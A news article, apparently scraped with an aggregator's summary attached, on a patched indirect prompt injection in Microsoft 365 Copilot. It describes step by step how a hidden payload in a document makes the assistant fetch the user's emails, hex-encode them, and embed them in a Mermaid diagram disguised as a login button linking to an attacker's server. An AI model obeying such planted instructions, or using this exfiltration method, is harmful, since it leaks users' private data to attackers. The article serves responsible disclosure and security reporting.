Article Details
Scrape Timestamp (UTC): 2025-10-24 19:06:55.028
Source: https://www.theregister.com/2025/10/24/m365_copilot_mermaid_indirect_prompt_injection/
Original Article Text
Click to Toggle View
Sneaky Mermaid attack in Microsoft 365 Copilot steals data. Redmond says it's fixed this particular indirect prompt injection vuln. Microsoft fixed a security hole in Microsoft 365 Copilot that allowed attackers to trick the AI assistant into stealing sensitive tenant data – like emails – via indirect prompt injection attacks. But the researcher who found and reported the bug to Redmond won't get a bug bounty payout, as Microsoft determined that M365 Copilot isn't in-scope for the vulnerability reward program. The attack uses indirect prompt injection – embedding malicious instructions into a prompt that the model can act upon, as opposed to direct prompt injection, which involves someone directly submitting malicious instructions to an AI system. Researcher Adam Logue discovered the data-stealing exploit, which abuses M365 Copilot's built-in support for Mermaid diagrams, a JavaScript-based tool that allows users to generate diagrams in using text prompts. In addition to integrating with M365 Copilot, Mermaid diagrams also support CSS. "This opens up some interesting attack vectors for data exfiltration, as M365 Copilot can generate a mermaid diagram on the fly and can include data retrieved from other tools in the diagram," Logue wrote in a blog about the bug and how to exploit it. As a proof of concept, Logue asked M365 Copilot to summarize a specially crafted financial report document with an indirect prompt injection payload hidden in the seeming innocuous "summarize this document" prompt. The payload uses M365 Copilot's search_enterprise_emails tool to fetch the user's recent emails, and instructs the AI assistant to generate a bulleted list of the fetched contents, hex encode the output, and split up the string of hex-encoded output into multiple lines containing up to 30 characters per line. Logue then exploited M365 Copilot's Mermaid integration to generate a diagram that looked like a login button, plus a notice that the documents couldn't be viewed unless the user clicked the button. This fake login button contained CSS style elements with a hyperlink to an attacker-controlled server – in this case, Logue's Burp Collaborator server. When a user clicked the button, the hex-encoded tenant data – in this case, a bulleted list of recent emails – was sent to the malicious server. From there, an attacker could decode the data and do all the nefarious things criminals do with stolen data, like sell it to other crims, extort the victim for its return, uncover account numbers and/or credentials inside the messages, and other super fun stuff - if you are evil. Logue reported the flaw to Microsoft, and Redmond told him it patched the vulnerability, which he verified by trying the attack again and failing. But the decision-makers on such things also determined that M365 Copilot was out-of-scope for its bug-bounty program, and therefore not eligible for a reward. The Register asked Microsoft for more details about the patch and the out-of-scope determination, and will update this story if and when we receive a response.
Daily Brief Summary
Microsoft addressed a security vulnerability in Microsoft 365 Copilot that allowed data theft through indirect prompt injection attacks, potentially exposing sensitive tenant information such as emails.
The vulnerability exploited Mermaid diagrams, a JavaScript-based tool, to execute malicious instructions embedded in text prompts, enabling unauthorized data exfiltration.
Researcher Adam Logue, who discovered the flaw, demonstrated how the attack could retrieve and encode user emails, sending them to a malicious server via a fake login button.
Despite the successful identification and reporting of the bug, Microsoft deemed M365 Copilot outside the scope of its bug bounty program, resulting in no reward for the researcher.
The patch has been verified, preventing further exploitation of this specific vulnerability, though the incident raises concerns about the security of AI-driven tools in handling sensitive data.
Organizations using AI tools like M365 Copilot should remain vigilant and ensure robust security measures are in place to mitigate similar risks.
The incident underscores the importance of expanding bug bounty programs to cover emerging technologies and platforms to encourage proactive vulnerability discovery and reporting.